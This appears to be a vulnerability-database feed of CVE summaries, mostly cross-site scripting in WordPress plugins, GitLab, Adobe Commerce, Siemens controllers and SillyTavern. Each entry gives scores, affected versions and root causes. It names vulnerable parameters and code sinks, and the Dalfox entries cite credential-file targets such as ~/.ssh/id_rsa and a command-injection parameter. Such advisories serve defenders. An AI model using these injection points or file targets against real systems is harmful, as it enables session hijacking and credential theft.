Stored Cross-Site Scripting in the Bold Page Builder WordPress plugin (versions up to and including 5.6.8) allows authenticated attackers holding contributor-level access or higher to inject persistent malicious JavaScript via the 'text' attribute of the bt_bb_button shortcode. The script executes in the browser of any user who subsequently loads the compromised page, including administrators, enabling session hijacking or unauthorized action execution under victim identity. No active exploitation is confirmed - the vulnerability is absent from CISA KEV, carries an EPSS score of 0.03% (8th percentile), and SSVC designates exploitation status as none.

XSS WordPress Bold Page Builder
NVD
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting in GitLab Enterprise Edition lets an authenticated user holding Developer-role permissions inject arbitrary JavaScript that executes in the browsers of other users who view the affected content. The flaw stems from improper input sanitization and affects all 16.4-series through 18.11.x releases prior to the 18.9.7, 18.10.6, and 18.11.3 patch releases. No public exploit identified at time of analysis, and EPSS is very low (0.02%), but CVSS is rated 8.7 because the scope-changing XSS can hijack higher-privileged user sessions.

XSS Gitlab
NVD VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting in GitLab Enterprise Edition's customizable analytics dashboards allows an authenticated user to execute arbitrary JavaScript in the browsers of other users who view the affected dashboard. The flaw affects EE 18.7-18.9.6, 18.10-18.10.5, and 18.11-18.11.2, carries a CVSS 8.7 (scope-changed) rating, and a vendor patch is available. No public exploit identified at time of analysis and EPSS is very low (0.02%, 5th percentile).

XSS Gitlab
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the GLS Shipping for WooCommerce WordPress plugin (all versions through 1.4.0) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'failed_orders' parameter, executing in victims' browsers when they interact with a crafted link. The CVSS vector (PR:N, S:C) confirms no authentication is needed by the attacker, though user interaction is required, and the Changed scope rating means successful exploitation can affect resources beyond the plugin's own context - such as session tokens or other page content. No active exploitation is identified at time of analysis; EPSS stands at 0.06% (17th percentile) and CISA SSVC assigns exploitation status of 'none', making this a theoretical rather than emergent threat.

XSS WordPress
NVD
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cross-site scripting in GitLab CE/EE 18.11.x (before 18.11.3) enables an authenticated low-privilege attacker to inject unsanitized content that executes arbitrary JavaScript within another user's browser session. The CVSS Scope Changed (S:C) flag reflects the cross-user impact boundary: the vulnerability allows one GitLab principal to affect a distinct security context belonging to a different user, including potentially higher-privileged accounts such as project owners or instance administrators. No public exploit code exists and no active exploitation has been identified - EPSS at 0.02% (5th percentile) and SSVC exploitation status of 'none' both confirm low immediate urgency - though GitLab's wide enterprise deployment makes patching to 18.11.3 advisable.

XSS Gitlab RCE
NVD
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting in GitLab Enterprise Edition 18.7-18.11.x allows an authenticated user to inject arbitrary JavaScript that executes in other users' browser sessions due to improper input sanitization. The CVSS 8.7 score is elevated by Scope:Changed (S:C), reflecting that injected script can pivot across security contexts and potentially target administrators. No public exploit identified at time of analysis, EPSS is very low (0.02%, 5th percentile), and SSVC indicates no observed exploitation, but a vendor patch is available across all three affected branches.

XSS Gitlab
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in The Plus Addons for Elementor WordPress plugin (all versions through 6.4.11) allows authenticated contributors to persistently inject arbitrary JavaScript via the `menu_hover_click` parameter of the Navigation Menu Lite widget. The CVSS scope change (S:C) confirms the payload executes in visiting users' browser contexts rather than the attacker's, enabling session hijacking, credential harvesting, or admin account takeover against any user who loads an affected page. EPSS is very low at 0.03% (8th percentile) and SSVC confirms no known exploitation, but the low privilege bar - contributor access, which is routinely granted on multi-author WordPress sites - elevates practical risk above what the medium CVSS score alone suggests.

XSS WordPress
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the MapGeo - Interactive Geo Maps WordPress plugin (all versions through 1.6.27) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'map' parameter of the display-map shortcode. Exploitation requires tricking an authenticated or anonymous site visitor into clicking a crafted URL, after which the injected script executes in the victim's browser within the plugin's page scope. No public exploit code or CISA KEV listing exists at time of analysis; EPSS probability is 0.06%, placing this in the 19th percentile of exploitation likelihood.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Envira Gallery Lite (WordPress plugin, versions ≤ 1.12.4) enables authenticated attackers with Author-level access to inject persistent arbitrary JavaScript into gallery pages via the REST API. The attack exploits a context mismatch: the `arrows` gallery parameter is omitted from `sanitize_config_values()` sanitization, and `gallery_init()` escapes it with `esc_attr()` — a function designed for HTML attribute contexts, not inline JavaScript — allowing JavaScript expression injection that executes in any visitor's browser. No public exploit or active exploitation has been identified; EPSS is 0.01% and CISA KEV status is absent, placing this firmly in the low-immediate-risk tier despite its persistent, cross-user impact.

XSS WordPress Envira Gallery Image Photo Gallery Albums Video Gallery Slideshows More
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-site scripting (XSS) vulnerability in Northern.tech CFEngine Enterprise before versions 3.21.8, 3.24.3, and 3.27.0 allows remote attackers to inject malicious scripts into web application responses. User interaction is required to trigger the vulnerability, limiting real-time automation of attacks but enabling account compromise, session hijacking, or credential theft against CFEngine administrators and users. No public exploit code or active exploitation has been identified at the time of analysis.

XSS
NVD VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Stored cross-site scripting in CVAT (Computer Vision Annotation Tool) versions 2.5.0 through 2.63.0 allows an authenticated user with annotation-guide create/edit privileges to inject malicious JavaScript into a task's annotation guide, which executes in any victim's browser that opens it. Executed script runs with the victim's CVAT session privileges, enabling arbitrary API requests on their behalf. No public exploit identified at time of analysis; EPSS is low (0.05%) and SSVC reports no observed exploitation.

XSS Cvat
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

Reflected XSS in CubeCart v6 (prior to 6.7.0) enables unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted search URL that triggers a specific single-result code path in the search feature. The flaw exists in classes/catalogue.class.php where the searchCatalogue() method reflects the raw $_REQUEST['search']['keywords'] parameter in a notification message without sanitization - but only when the search returns exactly one product, bypassing all other input filters. A working exploit is publicly available on Exploit-DB (52588), though no public exploit identified at time of analysis places this in CISA KEV, and EPSS remains low at 0.03%.

PHP XSS V6
NVD GitHub Exploit-DB VulDB
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored Cross-Site Scripting in CubeCart v6.x (prior to 6.6.0) allows an authenticated administrator to inject persistent malicious JavaScript into product creation or modification fields, which then executes in the browsers of any user - customer or fellow administrator - who views the affected product pages. The attack requires high-privilege access (PR:H) and victim interaction (UI:R), limiting its realistic threat surface to compromised or malicious admin accounts. No public exploit identified at time of analysis via KEV, though SSVC data indicates proof-of-concept code exists; EPSS stands at 0.03% (8th percentile), reflecting low observed exploitation pressure.

XSS V6
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in Quark Drive (quark-auto-save) before version 0.8.5 allows an authenticated low-privileged user to inject persistent JavaScript payloads that execute in the browsers of all authenticated users who view the System Configuration page. The root cause is Vue.js's v-html directive rendering push_config key names as raw HTML without sanitization, with payloads written to disk via the POST /update endpoint. No public exploit code has been identified at time of analysis, and the EPSS score of 0.03% (10th percentile) signals very low current exploitation probability, but the persistent, multi-victim nature of the stored XSS elevates real-world impact in multi-user deployments.

XSS Quark Auto Save
NVD GitHub VulDB
EPSS 0% CVSS 8.3
HIGH This Week

Use of an end-of-life jQuery 1.x library in HCL BigFix SCM Reporting 11.0.5 exposes the management console to client-side attacks, including DOM-based XSS, inherited from publicly known unpatched flaws in the dependency. With no public exploit identified at time of analysis and a very low EPSS score (0.04%), the CVSS 8.3 rating reflects high theoretical impact rather than confirmed in-the-wild abuse, though successful exploitation requires user interaction with a crafted resource.

XSS Bigfix Scm Reporting
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

Stored cross-site scripting in Palo Alto Networks PAN-OS® web interface allows a malicious authenticated administrator to inject persistent JavaScript payloads that execute in the browsers of other users who view the affected pages. Affected deployments include PA-Series and VM-Series firewalls and Panorama (virtual and M-Series) running PAN-OS 10.2.x, 11.1.x, 11.2.x, and 12.1.x branches. No active exploitation is confirmed - EPSS stands at 0.04% (13th percentile), SSVC exploitation status is 'none', and no public exploit code has been identified at time of analysis. Vendor-released patches are available for all affected branches.

Paloalto XSS Cloud Ngfw +2
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Stored XSS in Alinto SOGo's ICS calendar invitation viewer enables a remote unauthenticated attacker to execute arbitrary JavaScript within an authenticated victim's SOGo webmail session. Affected versions span all releases prior to 5.12.8; the root cause is an incomplete blocklist sanitizer in NSString+Utilities.m that explicitly blocked only 'onload' and 'onmouseover' event handlers, leaving the SVG animation event 'onrepeat' unfiltered when SVG content appears in an ICS DESCRIPTION field. No public exploit has been identified at time of analysis and CISA SSVC confirms no active exploitation, but the CVSS Scope:Changed rating reflects that successful execution grants the attacker full access to the victim's authenticated session context, enabling mailbox access, contact theft, and session hijacking.

XSS Sogo
NVD GitHub VulDB
EPSS 0% CVSS 9.0
CRITICAL Act Now

Stored cross-site scripting in SiYuan's Bazaar marketplace (versions ≤ 3.6.5) escalates to arbitrary OS command execution on the Electron desktop client because the kernel sanitizer in kernel/bazaar/package.go HTML-escapes only Author, DisplayName, and Description while passing Name and Version straight to innerHTML sinks. Any attacker who can publish a plugin/theme/template/widget/icon manifest to the public Bazaar - or otherwise drop a malicious plugin.json into the workspace - triggers zero-click code execution the moment a victim opens Settings → Marketplace → Downloaded → Plugins. A detailed POC against b3log/siyuan:v3.6.5 is published in the GHSA advisory; publicly available exploit code exists, though EPSS remains low at 0.04%.

XSS Command Injection Canonical +2
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM POC This Month

Powie's WHOIS Domain Check 0.9.31 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by exploiting unsanitized input fields in. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS
NVD Exploit-DB
EPSS 0% CVSS 5.1
MEDIUM POC This Month

Kuicms Php EE 2.0 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted content through the bbs reply. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS
NVD Exploit-DB
EPSS 0% CVSS 4.8
MEDIUM POC This Month

WOOF Products Filter for WooCommerce 1.2.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering XSS payloads in design. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS WordPress
NVD Exploit-DB
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in Custom Twitter Feeds plugin for WordPress versions ≤2.5.4 allows unauthenticated remote attackers to execute arbitrary JavaScript when malicious content enters cached tweet data. The vulnerability stems from the ctf_get_more_posts AJAX endpoint outputting cached tweet text through nl2br() without HTML escaping, accessible without authentication (CVSS:3.1/AV:N/AC:L/PR:N/UI:N). Attack requires either posting malicious tweets that the target site caches via its feed configuration, or leveraging other vulnerabilities to poison the tweet cache. No active exploitation confirmed at time of analysis. Wordfence identified the flaw with patch available in changeset 3519584.

XSS WordPress
NVD
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored cross-site scripting vulnerability in ELECOM wireless LAN access point devices (WAB-BE187-M, WAB-BE72-M, WAB-BE36-M, WAB-BE36-S) allows authenticated administrators to inject malicious scripts that execute in other administrators' web browsers when they access the device management interface. Exploitation requires high-privilege administrative credentials and user interaction (victim must visit the admin panel), limiting real-world risk despite network-accessible attack surface.

XSS Wab Be187 M Wab Be72 M +2
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Snow Monkey Blocks WordPress plugin up to version 24.1.11 allows authenticated attackers with Contributor-level or higher privileges to inject arbitrary JavaScript via the 'data-slick' attribute, which executes in the browsers of all users who view the affected pages. The vulnerability stems from insufficient input sanitization and output escaping in block rendering functionality. CVSS 6.4 reflects the moderate severity; exploitation requires prior authentication and contributor access, limiting the attack surface to trusted WordPress users or accounts obtained through compromise.

XSS WordPress
NVD
EPSS 0% CVSS 5.5
MEDIUM This Month

Stored Cross-Site Scripting in WPC Badge Management for WooCommerce plugin versions up to 3.1.6 allows authenticated attackers with Shop Manager-level access to inject arbitrary JavaScript via the 'text' attribute of the wpcbm_best_seller shortcode. The injected scripts execute in the browsers of any user visiting the affected page, enabling credential theft, session hijacking, or defacement. The vulnerability stems from insufficient input sanitization and output escaping in shortcode processing.

XSS WordPress
NVD
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in Broadstreet plugin for WordPress versions up to 1.53.1 allows authenticated administrators to inject arbitrary JavaScript into admin settings that executes for all users viewing affected pages. The vulnerability requires administrator-level access, high attack complexity due to disabled unfiltered_html or multi-site configuration restrictions, and impacts confidentiality and integrity with limited scope. No active exploitation confirmed at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting (XSS) in Fluent Forms WordPress plugin versions up to 6.2.1 allows authenticated contributors and above to inject arbitrary JavaScript into pages via the 'permission_message' parameter, which executes when any user views the affected page. The vulnerability stems from insufficient input sanitization and output escaping in the Component module. No active exploitation or public proof-of-concept has been reported, but the low attack complexity and network accessibility make this a practical risk for WordPress sites with contributor-level user accounts.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in Cost of Goods: Product Cost & Profit Calculator for WooCommerce plugin (all versions up to 4.1.0) allows authenticated attackers with contributor-level access to inject arbitrary JavaScript via unsanitized shortcode attributes 'alg_wc_cog_product_cost' and 'alg_wc_cog_product_profit', which executes in the browsers of all users viewing the affected pages. The vulnerability requires prior account access but no user interaction for execution, making it a persistent attack vector for privilege escalation or malicious content injection on WordPress sites.

XSS WordPress
NVD
EPSS 0% CVSS 2.9
LOW PATCH Monitor

Astro versions prior to 6.1.10 fail to bind encrypted server island parameters to their intended component and purpose, allowing attackers to replay encrypted props as slots or vice versa. This cryptographic binding failure could lead to cross-site scripting (XSS) when applications use server islands with overlapping prop and slot names where an attacker controls prop values. The vulnerability requires very specific application architecture (shared key names, dynamically rendered pages, attacker-controlled props) making real-world exploitation unlikely, but the underlying encryption design flaw is significant.

XSS
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM This Month

Reflected cross-site scripting (XSS) in Garmin WDU v1 1.4.6 and v2 5.0 allows local network attackers to execute arbitrary JavaScript with full administrator-level access to the device. Exploitation requires the victim to visit a malicious URL and click an element on the rendered page, making this a moderate-risk vulnerability primarily affecting users on trusted networks who may be socially engineered.

XSS
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM This Month

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, a remote attacker can create a map node with a malicious label that contains arbitrary HTML. When the map tab is selected and a map node marker is selected, it will render the arbitrary HTML, potentially triggering stored XSS. This vulnerability is fixed in 1.2.3.

XSS
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

## Resolution Fixed in SillyTavern 1.18.0: a user-provided URL is no longer reflected in the HTTP response body. ## Overview - Vulnerability Type: XSS - Affected Location: `src/middleware/corsProxy.js:40` - Trigger Scenario: reflected XSS in CORS proxy error response ## Root Cause When `fetch(url)` throws, the code sends: `res.status(500).send('Error occurred while trying to proxy to: ' + url + ' ' + error)`. The `url` value is attacker-controlled (`req.params.url`) and is not HTML-escaped before rendering. ## Source-to-Sink Chain 1. Source (user-controlled input) - Entry point: `GET /proxy/:url(*)` 2. Data flow - Code analysis shows concrete propagation into this sink: - vulnerability title: `Reflected XSS in CORS proxy error response` - sink location reached by attacker-controlled input: `src/middleware/corsProxy.js:40` - The same sink behavior is confirmed by controlled execution observations. 3. Sink (dangerous operation) - Sink location: `src/middleware/corsProxy.js:40` - Vulnerable behavior: reflected XSS in CORS proxy error response ## Exploitation Preconditions 1. The attacker can inject controllable content into a rendered response. 2. The vulnerable rendering context does not apply strict output encoding/sanitization. 3. A victim user opens the affected page or response. ## Risk This issue enables script execution in the victim context and can compromise session or data integrity. ## Impact An attacker may run arbitrary JavaScript in the victim context, steal tokens, and manipulate user-visible behavior. ## Remediation 1. Never concatenate raw user input into HTML error responses. 2. If URL echo is required, HTML-escape it or force plain-text output. 3. Re-enable/strengthen CSP to reduce reflected injection impact.

XSS
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

### Summary Changing a user’s password does not invalidate existing sessions, allowing an attacker with a stolen cookie to retain access even after the victim resets their password. ### Details SillyTavern relies on cookie-session for authentication, storing all session data (user handle, permissions) in a signed cookie. The endpoints POST /api/users/change-password and POST /api/users/recover-step2 only update the password hash in the database but do not expire current sessions. Because the session is stateless and stored entirely in the client cookie, there is no server-side mechanism to revoke a token once issued. ### PoC 1.Log into the same SillyTavern account from two different browsers (e.g., Chrome and Firefox private mode). 2.In Chrome, change the account password under User Settings → Change Password. 3.In Firefox, refresh the page or perform a protected action (e.g., view API keys). 4.Expected: Firefox session should be invalidated and ask for login. 5.Actual: Firefox remains fully authenticated, able to perform all actions as the targeted user. ### Impact An attacker who obtains a valid session cookie (via XSS, MITM, physical access, etc.) can continue using it indefinitely, even after the legitimate user changes their password. This nullifies the most common recovery measure against session theft. The default cookie lifespan is 400 days, giving an attacker a very long exploitation window. ### Resolution A fix was released in the version 1.18.0, invalidating a session cookie on account password change.

Mozilla Google XSS +1
NVD GitHub VulDB
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the previewServlet serves files with their detected MIME type based on file extension, without any content sanitization or security headers. Files with .html, .htm, or .svg extensions are served as text/html or image/svg+xml respectively, causing any embedded JavaScript to execute in the victim's browser within the application's origin. This vulnerability is fixed in 4.08.010.

XSS Efw4 X
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.

XSS Adobe
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed.

XSS Adobe
NVD
EPSS 0% CVSS 4.8
MEDIUM This Month

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.

XSS Adobe
NVD
EPSS 0% CVSS 8.8
HIGH This Week

A vulnerability in the web-based management interface of Access Points running AOS-10 and AOS-8 Instant could allow an unauthenticated remote attacker to execute arbitrary JavaScript code in a victim's browser within the same local network. Successful exploitation could allow an attacker to compromise user data and potentially manipulate device configuration settings.

XSS Arubaos Aos
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

AntSword is a cross-platform website management toolkit. Prior to 2.1.16, incomplete noxss() sanitization leads to 1-click RCE via jquery.terminal format code injection. This vulnerability is fixed in 2.1.16.

XSS
NVD GitHub
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Improper neutralization of script-related html tags in a web page (basic xss) in Visual Studio Code allows an unauthorized attacker to execute code locally.

XSS Visual Studio Code
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH Exploit Unlikely This Month

Improper neutralization of input during web page generation ('cross-site scripting') in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.

XSS Visual Studio Code
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Complete process crash in Dalfox REST server v2.12.0 and earlier allows remote unauthenticated attackers to terminate the entire scan engine via a single HTTP request. The flaw stems from a closed-channel write panic in pkg/scanning/parameterAnalysis.go where two sequential worker stages share a single results channel, causing a Go runtime panic when the second stage attempts to write to the already-closed channel. Default deployments run without authentication (no --api-key), making the vulnerability remotely exploitable. CVSS 7.5 (High). Patched in v2.13.0 per GitHub advisory GHSA-2g4x-fq3j-cgq4. No CISA KEV listing or public exploit code identified at time of analysis.

XSS Docker Race Condition
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Unauthenticated arbitrary file read in dalfox REST API server mode allows remote attackers to exfiltrate sensitive files from the host filesystem. The vulnerability chains two flaws: missing authentication middleware when no API key is set (default configuration), and unsanitized deserialization of the `custom-payload-file` JSON parameter directly into the scan engine. Remote attackers can supply any file path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`, cloud credential files) and the engine reads each line, embeds it as an XSS payload, and transmits it to an attacker-controlled HTTP endpoint via dalfox's own scan traffic. No exploit code is publicly identified at time of analysis; vendor-released patch available in version 2.13.0.

Authentication Bypass XSS Privilege Escalation
NVD GitHub
EPSS 0% CVSS 10.0
CRITICAL POC PATCH Act Now

Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).

Denial Of Service Command Injection Authentication Bypass +3
NVD GitHub
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored cross-site scripting (XSS) in the Continually WordPress plugin versions up to 4.3.1 allows authenticated administrators to inject arbitrary web scripts into admin settings that execute whenever users access affected pages. The vulnerability requires high-privilege administrator access and is limited to multisite WordPress installations or sites with unfiltered_html disabled, resulting in low CVSS impact (4.4) despite network accessibility. No public exploit code or active exploitation has been identified at this time.

XSS WordPress
NVD
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in FastBots plugin for WordPress up to version 1.0.12 allows authenticated administrators to inject arbitrary JavaScript into admin settings that executes when any user accesses affected pages. The vulnerability requires high-privilege administrator access and affects only multi-site WordPress installations or single-site installations with the unfiltered_html capability disabled. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 8.5
HIGH Act Now

Stored cross-site scripting (XSS) in Siemens Teamcenter allows authenticated attackers with low privileges to inject malicious JavaScript that executes in other users' browser sessions, enabling session hijacking, credential theft, or unauthorized actions within the product lifecycle management platform. Affects Teamcenter versions V2312 through V2512 with vendor patches released for all branches. CVSS v4.0 scores 8.5 (High) due to network attack vector with low complexity, though exploitation requires user interaction and authenticated access. No public exploit code or CISA KEV listing identified at time of analysis.

XSS Teamcenter V2312 Teamcenter V2406 +3
NVD VulDB
EPSS 0% CVSS 7.2
HIGH Act Now

Cross-site scripting (XSS) in Siemens SIMATIC S7-1500 PLC family firmware upload interface allows authenticated attackers to execute malicious JavaScript in administrator sessions via crafted filenames. This stored XSS requires social engineering to trick authenticated users into selecting the attacker-supplied firmware file on the web-based management interface. Successful exploitation enables session hijacking and credential theft without requiring the malicious file to be uploaded. EPSS data not provided, no CISA KEV status confirmed, affecting industrial automation controllers widely deployed in critical infrastructure environments.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf +97
NVD VulDB
EPSS 0% CVSS 9.3
CRITICAL Emergency

Stored cross-site scripting (XSS) in Siemens SIMATIC S7-1500 and ET 200SP controller families allows authenticated attackers with high privileges to inject malicious scripts via Technology Object (TO) names when downloading TIA Portal projects. The scripts execute when authorized users access the Motion Control Diagnostics web interface page, enabling session hijacking, credential theft, or privileged actions performed under the victim's context. This affects over 100 product variants across industrial automation controllers, software controllers, and open controllers. No active exploitation confirmed (not in CISA KEV). EPSS score not provided in dataset. CVSS 4.0 score of 9.3 reflects high impact across confidentiality, integrity, and availability in both vulnerable and subsequent systems.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf +97
NVD VulDB
EPSS 0% CVSS 9.3
CRITICAL Emergency

Stored cross-site scripting in Siemens SIMATIC S7-1500 controller family web interface allows authenticated high-privilege attackers to inject malicious code via crafted PLC/station names in TIA project files. When users with appropriate rights later access the communication parameters page, injected scripts execute in their session context with high impact to confidentiality, integrity, and availability across system boundaries (CVSS 9.3, CVSS:4.0 S:H). No public exploit identified at time of analysis, but CVSS vector indicates low attack complexity (AC:L) once attacker gains privileged project upload access.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf +97
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in BJ Lazy Load plugin for WordPress versions up to 1.0.9 allows authenticated attackers with Contributor-level access to inject arbitrary web scripts via regex-based HTML attribute manipulation in the `filter_images()` function. The vulnerability exploits improper handling of HTML attribute boundaries during `src` attribute replacement, enabling attackers to promote malicious content from class attribute values into executable DOM attributes. When victims access injected pages, the injected scripts execute in their browsers with the privileges of the compromised site.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Scratchblocks for WP plugin for WordPress allows authenticated contributors and above to inject arbitrary JavaScript through the 'element' attribute of the 'scratchblocks' shortcode due to insufficient input sanitization and output escaping. The vulnerability affects all versions up to 1.0.1 and enables malicious scripts to execute in the browsers of all users viewing affected pages, with cross-site scope impact.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting (XSS) in WP Google Maps Integration plugin for WordPress versions up to 1.2 allows unauthenticated attackers to inject arbitrary web scripts via the `page` parameter due to insufficient input sanitization and output escaping. Exploitation requires tricking an administrator into clicking a malicious link, but successful attacks can hijack admin sessions, modify site content, or steal credentials with medium attack complexity and limited immediate confidentiality and integrity impact.

XSS WordPress Google
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Credits Shortcode WordPress plugin up to version 1.2 allows authenticated contributors and above to inject arbitrary JavaScript via the 'link' attribute of the credits shortcode, which executes when other users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping on user-supplied shortcode attributes. CVSS 6.4 reflects moderate risk with network vector and limited scope impact, though real-world risk depends on site contributor population and user awareness.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in the Advanced Social Media Icons WordPress plugin through version 1.2 allows authenticated contributors and above to inject arbitrary JavaScript via insufficiently sanitized shortcode attributes, with execution occurring whenever any user views an affected page. The vulnerability affects all installations of the plugin up to and including version 1.2 and requires only Contributor-level WordPress access to exploit, making it a significant risk for multi-author sites.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Voyage Plus WordPress plugin versions up to 1.0.6 allows authenticated contributors and above to inject malicious scripts via the 'class' attribute of the 'post-content' shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users viewing affected pages, enabling credential theft, session hijacking, or malware distribution. No public exploit code or active KEV listing identified at time of analysis, but the vulnerability requires only contributor-level access and no user interaction, making it practical for insider threats or compromised contributor accounts.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Next Date WordPress plugin (all versions up to 1.0) allows authenticated contributors and above to inject arbitrary JavaScript into pages via the 'default' shortcode attribute due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, potentially compromising site visitors and administrators. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

SP Blog Designer plugin for WordPress versions up to 1.0.0 allows authenticated attackers with Contributor-level access to inject arbitrary web scripts via the 'design' attribute of the wpsbd_post_carousel shortcode, resulting in stored cross-site scripting (XSS) that executes for all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping in shortcode handling. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in Quick Table plugin for WordPress allows authenticated contributors and above to inject malicious scripts via the 'style' attribute of the 'qtbl' shortcode, which execute when any user views the affected page. The vulnerability affects all versions up to 1.0.0 due to insufficient input sanitization and output escaping. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 7.2
HIGH This Week

